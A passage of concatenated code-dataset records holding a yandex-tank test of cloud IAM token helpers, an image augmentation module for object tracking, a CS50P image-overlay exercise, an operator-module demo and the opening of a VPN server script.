'yandextank/plugins/DataUploader/tests/test_ycloud/json_key.json')\n\n\n@pytest.fixture()\ndef patch_get_iam_token_from_metadata():\n with patch('yandextank.plugins.DataUploader.ycloud.get_iam_token_from_metadata') as p:\n p.return_value = ('some_token', 123124123)\n yield p\n\n\n@pytest.mark.parametrize('file_path, expected', [\n (RAW_KEY_FILE_PATH, SAKey('', '', 'raw_private_key_content')),\n (JSON_KEY_FILE_PATH, SAKey('json service account id', 'json key id', 'json_private_key'))\n])\ndef test_load_sa_key(file_path, expected):\n actual = load_sa_key(file_path)\n assert actual.sa_id == expected.sa_id\n assert actual.key_id == expected.key_id\n assert actual.key == expected.key\n\n\n@pytest.mark.usefixtures('patch_get_iam_token_from_metadata')\n@pytest.mark.parametrize('args', [\n ({}),\n ({'unwanted': 'some_value'}),\n])\ndef test_get_auth_token_requester_metadata(args, patch_get_iam_token_from_metadata):\n _, _ = AuthTokenProvider.get_auth_token_requester(**args)()\n patch_get_iam_token_from_metadata.assert_called_once()\n\n\n@pytest.mark.parametrize('args, expected', [\n ({'iam_token': 'some_token_payload'}, 'some_token_payload')\n])\ndef test_get_auth_token_requester_iam(args, expected):\n token, _ = AuthTokenProvider.get_auth_token_requester(**args)()\n assert token == expected\n\n\n@pytest.mark.parametrize('args', [\n ({'sa_key': 'some_private_key', 'sa_id': 'some id'}),\n ({'sa_id': 'some id', 'sa_key_id': 'some key id'}),\n ({'sa_key_file': RAW_KEY_FILE_PATH})\n])\ndef test_get_auth_token_requester_raises_error(args):\n with pytest.raises(JWTError):\n _ = AuthTokenProvider.get_auth_token_requester(**args)\n\n\n@pytest.mark.parametrize('args, expected', [\n (\n {'sa_key': 'pk', 'sa_id': 'said', 'sa_key_id': 'sakeyid'},\n SAKey('said', 'sakeyid', 'pk')\n ),\n (\n {'sa_key_file': RAW_KEY_FILE_PATH, 'sa_id': 'said', 'sa_key_id': 'sakeyid'},\n SAKey('said', 'sakeyid', 'raw_private_key_content')\n ),\n (\n {'sa_key_file': JSON_KEY_FILE_PATH, 'sa_id': 'said', 'sa_key_id': 'sakeyid'},\n SAKey('said', 'sakeyid', 'json_private_key')\n ),\n (\n {'sa_key_file': JSON_KEY_FILE_PATH},\n SAKey('json service account id', 'json key id', 'json_private_key')\n )\n])\ndef test_build_sa_key(args, expected):\n actual = build_sa_key(**args)\n\n assert actual.sa_id == expected.sa_id\n assert actual.key_id == expected.key_id\n assert actual.key == expected.key\n\n\n@pytest.mark.parametrize('url, expected_host, expected_port', [\n ('localhost:443', 'localhost', 443),\n ('loadtesting.api.cloud.yandex.net:443', 'loadtesting.api.cloud.yandex.net', 443),\n ('https://api.cloud.yandex.net:1000', 'api.cloud.yandex.net', 1000),\n ('https://api.cloud.yandex.net/iam/v1/tokens', 'api.cloud.yandex.net', None),\n ('https://128.13.14.65:100', '128.13.14.65', 100),\n ('128.13.14.65:100', '128.13.14.65', 100),\n])\ndef test_urlparser(url, expected_host, expected_port):\n host, port = _get_host_port_from_url(url)\n\n assert host == expected_host\n assert port == expected_port\n\n\n@pytest.mark.parametrize('url, expected', [\n ('localhost:443', 'https://localhost/iam/v1/tokens'),\n ('loadtesting.api.cloud.yandex.net:443', 'https://loadtesting.api.cloud.yandex.net/iam/v1/tokens'),\n ('https://api.cloud.yandex.net:1000', 'https://api.cloud.yandex.net/iam/v1/tokens'),\n ('https://api.cloud.yandex.net/iam/v1/tokens', 'https://api.cloud.yandex.net/iam/v1/tokens'),\n ('https://128.13.14.65:100', 'https://128.13.14.65/iam/v1/tokens'),\n ('128.13.14.65:100', 'https://128.13.14.65/iam/v1/tokens'),\n (None, 'https://iam.api.cloud.yandex.net/iam/v1/tokens'),\n])\ndef test_audience_url(url, expected):\n assert expected == JwtTokenRequester(url, MagicMock(), MagicMock()).audience_url\n","repo_name":"yandex/yandex-tank","sub_path":"yandextank/plugins/DataUploader/tests/test_ycloud.py","file_name":"test_ycloud.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":2344,"dataset":"github-code","pt":"19"} +{"seq_id":"19531950400","text":"\r\n\r\nimport random\r\nimport math\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nfrom utils.image import letterbox_image\r\nfrom utils.bbox import corner2center, Center, center2corner, Corner, clip_bbox_corner\r\nfrom utils.rand import rand, random_sys\r\n\r\nPCA_STD = 0.1\r\nRGB_VAR = np.array([[-0.55919361, 0.98062831, - 0.41940627],\r\n [1.72091413, 0.19879334, - 1.82968581],\r\n [4.64467907, 4.73710203, 4.88324118]], dtype=np.float32)\r\nEIGVAL = np.array([55.46, 4.794, 1.148], dtype=np.float32)\r\nEIGVEC = np.array([[-0.5836, -0.6948, 0.4203],\r\n [-0.5808, -0.0045, -0.8140],\r\n [-0.5675, 0.7192, 0.4009]], dtype=np.float32)\r\n\r\n\r\ndef random_crop(image, bbox, size, crop_settings, mix_boxes=None):\r\n \"\"\"\r\n Local模式下的 random scale and shift crop augmentation\r\n refers to the paper of SiamRPN++ and the codes in PySOT\r\n 确定crop区域后,利用opencv的仿射变换从原图上提取出来\r\n\r\n :param image: 原图像\r\n :param bbox:\r\n :param size: 网络要求输入尺寸\r\n :param crop_settings:\r\n :param mix_boxes:\r\n :return: 随机放缩与crop扩增的图像与变换后的bbox\r\n \"\"\"\r\n mean_channel = np.mean(image, axis=(0, 1))[None, None, :]\r\n bbox = Corner(float(bbox[0]), float(bbox[1]), float(bbox[2]), float(bbox[3]))\r\n\r\n context_amount = crop_settings['context_amount']\r\n scale_x, scale_y = 1., 1.\r\n # 保留原长宽比的数据的比例\r\n if random_sys() > crop_settings['keep_scale_prob']:\r\n if random_sys() > 0.5:\r\n scale_x = rand(crop_settings['min_scale'], crop_settings['max_scale'])\r\n scale_y = rand(crop_settings['min_scale'], crop_settings['max_scale'])\r\n else:\r\n context_amount = context_amount * rand(crop_settings['min_scale'], crop_settings['max_scale'])\r\n\r\n bbox_center = corner2center(bbox)\r\n crop_w = bbox_center[2] + context_amount * (bbox_center[2] + bbox_center[3])\r\n crop_h = bbox_center[3] + context_amount * (bbox_center[2] + bbox_center[3])\r\n crop_size = np.sqrt(crop_w * crop_h) * crop_settings['crop_size_rate']\r\n crop_box_center = Center(bbox_center[0], bbox_center[1], crop_size * scale_x, crop_size * scale_y)\r\n crop_box = center2corner(crop_box_center)\r\n crop_box = Corner(int(crop_box[0]), int(crop_box[1]), int(crop_box[2]), int(crop_box[3]))\r\n\r\n shift = crop_size * crop_settings['shift_rate']\r\n box_protect_rate = crop_settings['box_protect_rate']\r\n # 目标仍在中央位置的数据的比例\r\n if random_sys() > crop_settings['keep_center_prob']:\r\n sx = rand(0., 1.) * shift * (1 if random_sys() > 0.5 else -1)\r\n sy = rand(0., 1.) * shift * (1 if random_sys() > 0.5 else -1)\r\n tw = bbox.x2 - bbox.x1\r\n th = bbox.y2 - bbox.y1\r\n left = bbox.x2 - box_protect_rate * tw - crop_box_center.w\r\n right = bbox.x1 + box_protect_rate * tw + crop_box_center.w\r\n top = bbox.y2 - box_protect_rate * th - crop_box_center.h\r\n bottom = bbox.y1 + box_protect_rate * th + crop_box_center.h\r\n\r\n sx = int(max(left - crop_box[0], min(right - 1 - crop_box[2], sx)))\r\n sy = int(max(top - crop_box[1], min(bottom - 1 - crop_box[3], sy)))\r\n crop_box = Corner(crop_box[0] + sx, crop_box[1] + sy, crop_box[2] + sx, crop_box[3] + sy)\r\n\r\n h, w = image.shape[:2]\r\n left_pad = max(0, -crop_box[0])\r\n top_pad = max(0, -crop_box[1])\r\n right_pad = max(0, crop_box[2] - w + 1)\r\n bottom_pad = max(0, crop_box[3] - h + 1)\r\n pad_image_size = (h + top_pad + bottom_pad, w + left_pad + right_pad, 3)\r\n pad_image = np.ones(pad_image_size) * mean_channel\r\n pad_image = pad_image.astype(np.uint8)\r\n pad_image[top_pad: top_pad + h, left_pad: left_pad + w, :] = image\r\n crop_box = Corner(crop_box[0] + left_pad, crop_box[1] + top_pad, crop_box[2] + left_pad, crop_box[3] + top_pad)\r\n crop_image = pad_image[crop_box[1]: crop_box[3] + 1, crop_box[0]: crop_box[2] + 1, :]\r\n\r\n # box在crop出区域中的相对坐标 = crop patch的左上角在原图像中的绝对坐标 - box在原图像中的绝对坐标\r\n bbox = Corner(max(bbox.x1 + float(left_pad - crop_box[0]), 0.),\r\n max(bbox.y1 + float(top_pad - crop_box[1]), 0.),\r\n min(bbox.x2 + float(left_pad - crop_box[0]), float(crop_box[2] - crop_box[0])),\r\n min(bbox.y2 + float(top_pad - crop_box[1]), float(crop_box[3] - crop_box[1])))\r\n bbox = np.array(bbox, dtype=np.float32)\r\n\r\n if mix_boxes is None:\r\n return letterbox_image(crop_image, size, bbox, padding=mean_channel)\r\n else:\r\n # 所有的干扰物体box也要进行坐标系转换\r\n all_box = mix_boxes.copy()\r\n num_boxes = len(all_box)\r\n if num_boxes > 0:\r\n for i in range(num_boxes):\r\n # 该过程可并行化\r\n box = all_box[i]\r\n box = Corner(max(box[0] + float(left_pad - crop_box[0]), 0.),\r\n max(box[1] + float(top_pad - crop_box[1]), 0.),\r\n min(box[2] + float(left_pad - crop_box[0]), float(crop_box[2] - crop_box[0])),\r\n min(box[3] + float(top_pad - crop_box[1]), float(crop_box[3] - crop_box[1])))\r\n all_box[i] = box\r\n\r\n all_box_ = np.concatenate([bbox.reshape(-1, 4), np.array(all_box, dtype=np.float32)], axis=0)\r\n crop_image, all_box_ = letterbox_image(crop_image, size, all_box_, padding=mean_channel)\r\n bbox = all_box_[0, :]\r\n target_area = np.prod(bbox[:2] - bbox[2:])\r\n all_box = all_box_[1:, :].reshape((-1, 4))\r\n diff = all_box[:, 2:] - all_box[:, :2]\r\n area = np.prod(diff, axis=1)\r\n not_ignore = np.where((diff[:, 0] >= 0.) & (diff[:, 1] >= 0.) & (area >= 225.) & (area < 9 * target_area))\r\n if not_ignore[0].shape[0] > 0:\r\n all_box = all_box[not_ignore]\r\n else:\r\n all_box = None\r\n else:\r\n crop_image, bbox = letterbox_image(crop_image, size, bbox, padding=mean_channel)\r\n all_box = None\r\n return crop_image, bbox, all_box\r\n\r\n\r\ndef image_augmentation(image, bbox, aug_settings, mix_boxes=None):\r\n image = image.astype(np.float32)\r\n random = random_sys(3)\r\n\r\n # flipping and rotating\r\n if bbox is not None and random[0] < aug_settings['flip']['threshold']:\r\n if mix_boxes is None:\r\n image, bbox = flip_aug(image, bbox)\r\n else:\r\n all_boxes = np.concatenate([bbox.reshape((-1, 4)), mix_boxes], axis=0)\r\n image, all_boxes = flip_aug(image, all_boxes)\r\n bbox = all_boxes[0, :]\r\n mix_boxes = all_boxes[1:, :]\r\n\r\n elif bbox is not None and random[0] < aug_settings['rotate']['threshold']:\r\n angle = rand(.2, 1.) * aug_settings['rotate']['max_angle']\r\n if mix_boxes is None:\r\n image, bbox = rotate_aug(image, bbox, angle=angle)\r\n else:\r\n all_boxes = np.concatenate([bbox.reshape((-1, 4)), mix_boxes], axis=0)\r\n image, all_boxes = rotate_aug(image, all_boxes, angle=angle)\r\n bbox = all_boxes[0, :]\r\n mix_boxes = all_boxes[1:, :]\r\n\r\n # filtering, motion blurring and random erasing\r\n if random[1] < aug_settings['blur']['threshold']:\r\n image = blur_aug(image)\r\n\r\n elif random[1] < aug_settings['motion']['threshold']:\r\n degree = max(int(rand(.2, 1.) * aug_settings['motion']['max_degree']), 1)\r\n angle = max(int(rand(.2, 1.) * aug_settings['motion']['max_angle']), 1)\r\n image = motion_blur(image, degree=degree, angle=angle)\r\n\r\n elif random[1] < aug_settings['erase']['threshold']:\r\n image = erase_aug(image, bbox)\r\n\r\n # color and pca variation\r\n if random[2] < aug_settings['pca']['threshold']:\r\n image = pca_aug(image)\r\n elif random[2] < aug_settings['color']['threshold']:\r\n image = color_aug(image)\r\n\r\n if mix_boxes is None:\r\n return image, bbox\r\n else:\r\n return image, bbox, mix_boxes\r\n\r\n\r\ndef rand_kernel():\r\n size = random.randrange(5, 20, 2)\r\n kernel = np.zeros((size, size))\r\n c = int(size/2)\r\n wx = random_sys()\r\n kernel[:, c] += 1. / size * wx\r\n kernel[c, :] += 1. / size * (1-wx)\r\n return kernel\r\n\r\n\r\ndef gray_aug(image):\r\n image = image.astype(np.uint8)\r\n grayed = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n image = cv2.cvtColor(grayed, cv2.COLOR_GRAY2BGR)\r\n image = image.astype(np.float32)\r\n return image\r\n\r\n\r\ndef pca_aug(image):\r\n rd = []\r\n for i in range(3):\r\n rd.append(random.normalvariate(0., PCA_STD))\r\n alpha = np.array(rd, dtype=np.float32).reshape((-1, ))\r\n offset = np.dot(EIGVEC * alpha, EIGVAL)\r\n image = image + offset\r\n return image\r\n\r\n\r\ndef blur_aug(image):\r\n kernel = rand_kernel()\r\n image = cv2.filter2D(image, -1, kernel)\r\n return image\r\n\r\n\r\ndef color_aug(image):\r\n rd = []\r\n for i in range(3):\r\n rd.append(random.normalvariate(0., 1.))\r\n rd = np.array(rd, dtype=np.float32).reshape((-1, 1))\r\n offset = np.dot(RGB_VAR, rd)\r\n offset = offset.reshape(3)\r\n image = image - offset\r\n image = np.maximum(np.minimum(image, 255.0), 0.0)\r\n return image\r\n\r\n\r\ndef motion_blur(image, degree=10, angle=40):\r\n # 这里生成任意角度的运动模糊kernel的矩阵, degree越大,模糊程度越高\r\n m = cv2.getRotationMatrix2D((degree / 2, degree / 2), angle, 1)\r\n motion_blur_kernel = np.diag(np.ones(degree))\r\n motion_blur_kernel = cv2.warpAffine(motion_blur_kernel, m, (degree, degree))\r\n motion_blur_kernel = motion_blur_kernel / degree\r\n blurred = cv2.filter2D(image, -1, motion_blur_kernel)\r\n return blurred\r\n\r\n\r\ndef flip_aug(image, bbox):\r\n image = cv2.flip(image, 1)\r\n width = image.shape[1]\r\n if len(bbox.shape) == 1:\r\n bbox = Corner(width - 1 - bbox[2], bbox[1], width - 1 - bbox[0], bbox[3])\r\n else:\r\n for i in range(bbox.shape[0]):\r\n box = bbox[i, :]\r\n box = Corner(width - 1 - box[2], box[1], width - 1 - box[0], box[3])\r\n bbox[i, :] = box\r\n bbox = np.array(bbox, dtype=np.float32)\r\n return image, bbox\r\n\r\n\r\ndef rotate_aug(img, bbox, angle=5, scale=1.):\r\n \"\"\"\r\n references:https://blog.csdn.net/saltriver/article/details/79680189\r\n https://www.ctolib.com/topics-44419.html\r\n 关于仿射变换:https://www.zhihu.com/question/20666664\r\n\r\n :param img: 图像array,(h,w,c)\r\n :param bbox: [x_min, y_min, x_max, y_max]形式的 bounding box\r\n :param angle: angle of rotation\r\n :param scale: 默认 1.\r\n :return:\r\n rot_img:旋转后的图像array;\r\n rot_bboxes:旋转后的boundingbox坐标list\r\n \"\"\"\r\n # ---------------------- 旋转图像 ----------------------\r\n w = img.shape[1]\r\n h = img.shape[0]\r\n # 角度变弧度\r\n rangle = np.deg2rad(angle)\r\n # 计算新图像的宽度和高度,分别为最高点和最低点的垂直距离\r\n nw = (abs(np.sin(rangle) * h) + abs(np.cos(rangle) * w)) * scale\r\n nh = (abs(np.cos(rangle) * h) + abs(np.sin(rangle) * w)) * scale\r\n # 获取图像绕着某一点的旋转矩阵\r\n # getRotationMatrix2D(Point2f center, double angle, double scale)\r\n # Point2f center:表示旋转的中心点\r\n # double angle:表示旋转的角度\r\n # double scale:图像缩放因子\r\n # 参考:https://cloud.tencent.com/developer/article/1425373\r\n rot_mat = cv2.getRotationMatrix2D((nw * 0.5, nh * 0.5), angle, scale) # 返回 2x3 矩阵\r\n # 新中心点与旧中心点之间的位置\r\n rot_move = np.dot(rot_mat, np.array([(nw - w) * 0.5, (nh - h) * 0.5, 0]))\r\n # the move only affects the translation, so update the translation\r\n # part of the transform\r\n rot_mat[0, 2] += rot_move[0]\r\n rot_mat[1, 2] += rot_move[1]\r\n # 仿射变换\r\n rotated_img = cv2.warpAffine(img,\r\n rot_mat,\r\n (int(math.ceil(nw)), int(math.ceil(nh))),\r\n flags=cv2.INTER_LANCZOS4,\r\n borderMode=cv2.BORDER_CONSTANT, # borderMode=cv2.BORDER_REFLECT,\r\n borderValue=tuple(np.mean(img, axis=(0, 1)).astype(np.uint8).tolist()))\r\n\r\n rotated_img = cv2.resize(rotated_img, (w, h), interpolation=cv2.INTER_CUBIC)\r\n\r\n # ---------------------- 矫正boundingbox ----------------------\r\n # rot_mat是最终的旋转矩阵\r\n # 获取原始bbox的四个中点,然后将这四个点转换到旋转后的坐标系下\r\n def rotate_box(box):\r\n x_min = box[0]\r\n y_min = box[1]\r\n x_max = box[2]\r\n y_max = box[3]\r\n point1 = np.dot(rot_mat, np.array([(x_min + x_max) / 2, y_min, 1]))\r\n point2 = np.dot(rot_mat, np.array([x_max, (y_min + y_max) / 2, 1]))\r\n point3 = np.dot(rot_mat, np.array([(x_min + x_max) / 2, y_max, 1]))\r\n point4 = np.dot(rot_mat, np.array([x_min, (y_min + y_max) / 2, 1]))\r\n\r\n # 合并np.array\r\n concat = np.vstack((point1, point2, point3, point4)) # 在竖直方向上堆叠\r\n # 改变array类型\r\n concat = concat.astype(np.int32)\r\n # 得到旋转后的坐标\r\n rx, ry, rw, rh = cv2.boundingRect(concat)\r\n rx_min = rx\r\n ry_min = ry\r\n rx_max = rx + rw\r\n ry_max = ry + rh\r\n # 加入list中\r\n rotated_box = np.array([rx_min, ry_min, rx_max, ry_max])\r\n\r\n scale_w = float(w) / nw\r\n scale_h = float(h) / nh\r\n rotated_box = rotated_box * np.array([scale_w, scale_h, scale_w, scale_h])\r\n return rotated_box\r\n\r\n if len(bbox.shape) == 1:\r\n bbox = rotate_box(bbox)\r\n else:\r\n for i in range(bbox.shape[0]):\r\n box = bbox[i, :]\r\n box = rotate_box(box)\r\n bbox[i, :] = box\r\n\r\n bbox = np.array(bbox, dtype=np.float32)\r\n return rotated_img, bbox\r\n\r\n\r\ndef erase_aug(image, bbox):\r\n \"\"\"\r\n 随机擦除目标上部分区域\r\n\r\n :param image:\r\n :param bbox:\r\n :return:\r\n \"\"\"\r\n ih, iw = image.shape[:2]\r\n bbox_xywh = corner2center(bbox)\r\n boundary = bbox_xywh * np.array([1., 1., rand(1., 1.2), rand(1., 1.2)], np.float32)\r\n\r\n w = boundary[2]\r\n h = boundary[3]\r\n\r\n scale1 = rand(0.15, 0.5)\r\n scale2 = rand(0.15, 0.2 / scale1)\r\n if random_sys() > 0.5:\r\n ew = int(w * scale1)\r\n eh = int(h * scale2)\r\n else:\r\n ew = int(w * scale2)\r\n eh = int(h * scale1)\r\n\r\n area = bbox - np.array([0., 0., ew, eh], np.float32)\r\n\r\n mask = np.zeros(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, area))\r\n mask[box[1]: box[3] + 1, box[0]: box[2] + 1] = 1.\r\n\r\n pos = np.where(mask == 1.)\r\n num = pos[0].shape[0]\r\n if num > 0:\r\n if num > 1:\r\n choice = random.randint(0, num-1)\r\n else:\r\n choice = 0\r\n y1, x1 = pos[0][choice], pos[1][choice]\r\n if y1 + eh < bbox[3] and x1 + ew < bbox[2]:\r\n image[y1: y1 + eh, x1: x1 + ew, :] = 127.5\r\n return image\r\n\r\n\r\ndef mix_aug(image, bbox, mix, min_rate, max_rate):\r\n \"\"\"\r\n 随机地将干扰物体放置在目标附近区域\r\n\r\n :param image:\r\n :param bbox:\r\n :param mix:\r\n :param min_rate:\r\n :param max_rate:\r\n :return:\r\n \"\"\"\r\n mix_h, mix_w = mix.shape[:2]\r\n ih, iw = image.shape[:2]\r\n size = np.array([-mix_w, -mix_h, 0., 0.], np.float32)\r\n boundary = np.array([0., 0., iw - mix_w - 1, ih - mix_h - 1], np.float32)\r\n\r\n bbox_xywh = corner2center(bbox)\r\n min_range = bbox_xywh * np.array([1., 1., min_rate, min_rate], np.float32)\r\n max_range = bbox_xywh * np.array([1., 1., max_rate, max_rate], np.float32)\r\n max_range_corner_ = center2corner(max_range)\r\n min_range_corner_ = center2corner(min_range)\r\n\r\n min_range_corner = min_range_corner_ + size\r\n min_x1y1 = np.maximum(min_range_corner[:2], boundary[:2])\r\n min_x2y2 = np.minimum(min_range_corner[2:], boundary[2:])\r\n min_range = np.concatenate([min_x1y1, min_x2y2])\r\n\r\n max_range_corner = max_range_corner_ + size\r\n max_x1y1 = np.maximum(max_range_corner[:2], boundary[:2])\r\n max_x2y2 = np.minimum(max_range_corner[2:], boundary[2:])\r\n max_range = np.concatenate([max_x1y1, max_x2y2])\r\n\r\n min_mask = np.ones(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, min_range))\r\n min_mask[box[1]: box[3] + 1, box[0]: box[2] + 1] = 0.\r\n\r\n max_mask = np.zeros(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, max_range))\r\n max_mask[box[1]: box[3] + 1, box[0]: box[2] + 1] = 1.\r\n\r\n mask = min_mask * max_mask\r\n\r\n center_pos = np.where(mask == 1.)\r\n num = center_pos[0].shape[0]\r\n if num > 0:\r\n if num > 1:\r\n choice = random.randint(0, num-1)\r\n else:\r\n choice = 0\r\n y1, x1 = center_pos[0][choice], center_pos[1][choice]\r\n if y1 + mix_h < ih and x1 + mix_w < iw:\r\n image[y1: y1 + mix_h, x1: x1 + mix_w] = mix\r\n mixed_box = np.array([x1, y1, x1 + mix_w, y1 + mix_h], dtype=np.float32)\r\n else:\r\n mixed_box = None\r\n else:\r\n mixed_box = None\r\n return image, mixed_box\r\n\r\n\r\ndef occ_aug(image, bbox, mix_object, center_rate, try_num=5, overlap_thresh=0.8):\r\n \"\"\"\r\n 随机地将干扰物体覆盖在目标上\r\n \"\"\"\r\n overlap = 0.\r\n mix_h, mix_w = mix_object.shape[:2]\r\n ih, iw = image.shape[:2]\r\n object_area = np.prod(bbox[2:] - bbox[:2])\r\n x, y, w, h = corner2center(bbox)\r\n\r\n counter = 0\r\n while counter < try_num and overlap <= overlap_thresh:\r\n x_rate, y_rate = rand(-center_rate, center_rate), rand(-center_rate, center_rate)\r\n ox = x + x_rate * w\r\n oy = y + y_rate * h\r\n occ_box = np.array([ox, oy, mix_w, mix_h], np.float32)\r\n occ_box = center2corner(occ_box)\r\n occ_box = clip_bbox_corner(occ_box, (ih, iw))\r\n inter_x1y1 = np.maximum(bbox[:2], occ_box[:2])\r\n inter_x2y2 = np.minimum(bbox[2:], occ_box[2:])\r\n inter_area = np.prod(inter_x2y2 - inter_x1y1)\r\n overlap = inter_area / (object_area + 1e-6)\r\n counter += 1\r\n\r\n if overlap > overlap_thresh:\r\n occ_box = list(map(int, occ_box))\r\n x1, y1, x2, y2 = occ_box\r\n if y1 + mix_h < ih and x1 + mix_w < iw:\r\n image[y1: y1 + mix_h, x1: x1 + mix_w] = mix_object\r\n occ_box = np.array([x1, y1, x1 + mix_w, y1 + mix_h], dtype=np.float32)\r\n else:\r\n occ_box = None\r\n else:\r\n occ_box = None\r\n return image, occ_box, overlap\r\n\r\n\r\ndef random_background(image, bbox, crop_settings, min_rate, max_rate):\r\n \"\"\"\r\n 在搜索图像中,随机crop一块尺寸形状与目标相似的背景区域\r\n 两种用途:\r\n 直接把该背景patch覆盖到目标box上,模拟遮挡干扰\r\n 以该box为中心,crop出搜索区域,之后将目标Box移动到这片背景区域上。增强网络的辨别能力与环境识别能力\r\n \"\"\"\r\n ih, iw = image.shape[:2]\r\n\r\n bbox_xywh = corner2center(bbox)\r\n w = int(bbox_xywh[2] * rand(min_rate, max_rate))\r\n h = int(bbox_xywh[3] * rand(min_rate, max_rate))\r\n\r\n # 取背景区域的左上角坐标范围\r\n boundary = np.array([0., 0., iw - w - 1., ih - h - 1.], np.float32)\r\n\r\n # 保护区,禁止被crop的区域\r\n # 当在图像中寻找目标的平移区域时,应避免在目标平移的新位置建立的搜索区域中仍然有目标,造成混淆\r\n # 利用crop_settings,按照建立搜索区域的方式,以目标为中心确定一片禁区,目标必须移动到禁区外\r\n # 当要从图像中随机crop一片区域作为遮挡物时,只要遮挡区域不与目标有交集即可(为增强辨别力,可允许有一点交集)\r\n if isinstance(crop_settings, dict):\r\n t = crop_settings['context_amount'] * (w + h)\r\n size = int(math.sqrt((w + t) * (h + t)) * crop_settings['crop_size_rate'])\r\n area = np.array([bbox_xywh[0], bbox_xywh[1], size, size], np.float32)\r\n else:\r\n area = bbox_xywh * np.array([1., 1., 1. + crop_settings, 1. + crop_settings], np.float32)\r\n\r\n area = center2corner(area)\r\n # 保护区的左上角坐标\r\n area = area + np.array([-w, -h, 0., 0.], np.float32)\r\n\r\n # 不能超过图像区域\r\n x1y1 = np.maximum(area[:2], np.array([0., 0.], np.float32))\r\n x2y2 = np.minimum(area[2:], np.array([iw - 1., ih - 1.], np.float32))\r\n corner = np.concatenate([x1y1, x2y2])\r\n\r\n mask1 = np.zeros(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, boundary))\r\n mask1[box[1]: box[3] + 1, box[0]: box[2] + 1] = 1.\r\n\r\n mask2 = np.ones(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, corner))\r\n mask2[box[1]: box[3] + 1, box[0]: box[2] + 1] = 0.\r\n\r\n mask = mask1 * mask2\r\n\r\n pos = np.where(mask == 1.)\r\n num = pos[0].shape[0]\r\n\r\n if num > 0:\r\n if num > 1:\r\n choice = random.randint(0, num-1)\r\n else:\r\n choice = 0\r\n y1, x1 = pos[0][choice], pos[1][choice]\r\n if y1 + h < ih and x1 + w < iw:\r\n mixed_box = np.array([x1, y1, x1 + w, y1 + h], dtype=np.float32)\r\n else:\r\n mixed_box = None\r\n else:\r\n mixed_box = None\r\n return mixed_box\r\n","repo_name":"bit-bcilab/SiamDCA","sub_path":"training/Augmentation.py","file_name":"Augmentation.py","file_ext":"py","file_size_in_byte":21335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15955762350","text":"\"\"\"\nImplement a program that expects exactly two command-line arguments:\n- in sys.argv[1], the name (or path) of a JPEG or PNG to read\n (i.e., open) as input\n- in sys.argv[2], the name (or path) of a JPEG or PNG to write\n (i.e., save) as output\n\nThe program should then overlay shirt.png (which has a transparent background)\non the input after resizing and cropping the input to be the same size, saving\nthe result as its output.\n\nOpen the input with Image.open, per pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.open, resize and crop the input with ImageOps.fit, per pillow.readthedocs.io/en/stable/reference/ImageOps.html#PIL.ImageOps.fit, using default values for method, bleed, and centering, overlay the shirt with Image.paste, per pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.paste, and save the result with Image.save, per pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.save.\n\nThe program should instead exit via sys.exit:\n- if the user does not specify exactly two command-line arguments,\n- if the input's and output's names do not end in .jpg, .jpeg, or .png,\n case-insensitively,\n- if the input's name does not have the same extension as the output's name, or\n- if the specified input does not exist.\n\nAssume that the input will be a photo of someone posing in just the right way,\nlike these demos, so that, when they’re resized and cropped, the shirt appears\nto fit perfectly.\n\"\"\"\n\n\nimport os\nimport sys\nfrom PIL import Image, ImageOps\n\n\ndef main():\n file_input, file_output = get_input()\n convert(file_input, file_output)\n\n\ndef convert(img_name_in, img_name_out=\"out.png\"):\n try:\n shirt = Image.open(\"shirt.png\") # .convert('RGBA')\n img = Image.open(img_name_in).convert(\"RGBA\")\n img_out = img\n # match photo and shirt\n img_out = ImageOps.fit(img_out, shirt.size)\n # paste over it - overlay\n img_out.paste(shirt, shirt)\n # save to file_output\n img_out_rgb = img_out.convert(\"RGB\")\n img_out_rgb.save(img_name_out)\n # close the image x2\n shirt.close()\n img.close()\n except FileNotFoundError:\n sys.exit(\"FileNotFoundError\")\n\n\ndef get_input() -> list:\n if len(sys.argv) < 3:\n sys.exit(\"Too few command-line arguments\")\n elif len(sys.argv) > 3:\n sys.exit(\"Too many command-line arguments\")\n elif (\n not os.path.isfile(sys.argv[1])\n or sys.argv[1].lower().rstrip().split(\".\")[-1] not in [\"png\", \"jpg\", \"jpeg\"]\n or sys.argv[2].lower().rstrip().split(\".\")[-1] not in [\"png\", \"jpg\", \"jpeg\"]\n ):\n sys.exit(\"Invalid input\")\n elif sys.argv[1][-3:] != sys.argv[2][-3:]:\n sys.exit(\"Input and output have different extensions\")\n else:\n return (sys.argv[1], sys.argv[2])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alex-anast/cs50p_2023","sub_path":"6_fileIO/shirt/shirt.py","file_name":"shirt.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17327527686","text":"__author__ = 'Hernan Y.Ke'\nfrom operator import itemgetter,attrgetter,methodcaller\ndt=[('New','NY'),('Tok','CA')]\n\nfor city in sorted(dt,key=itemgetter(1)):\n print(city)\n\nccname= itemgetter(1,0) # change index order\nfor city in dt:\n print(ccname(city))\n\n#attrgetter\ns = 'a b c'\nupcase = methodcaller('upper')\nprint(upcase(s)) #s.upper(), str.upper(s)\nhipen = methodcaller('replace',' ','-')\nprint(hipen(s))\n","repo_name":"rengokantai/obfluentpy3ed","sub_path":"CP5_firstclass_func/L5_23_itemgetter_multiple.py","file_name":"L5_23_itemgetter_multiple.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39394708652","text":"#!/usr/bin/python3\n\n\nfrom argparse import ArgumentParser\nfrom switch import VpnSwitch\n\n\ndef main() -> None:\n parser = ArgumentParser(description=\"m4gnum's vpn server\")\n\n parser.add_argument(\"ip\", type=str, help=\"vpn server's ip\")\n parser.add_argument(\"port\", type=int, help=\"vpn server's port\")\n 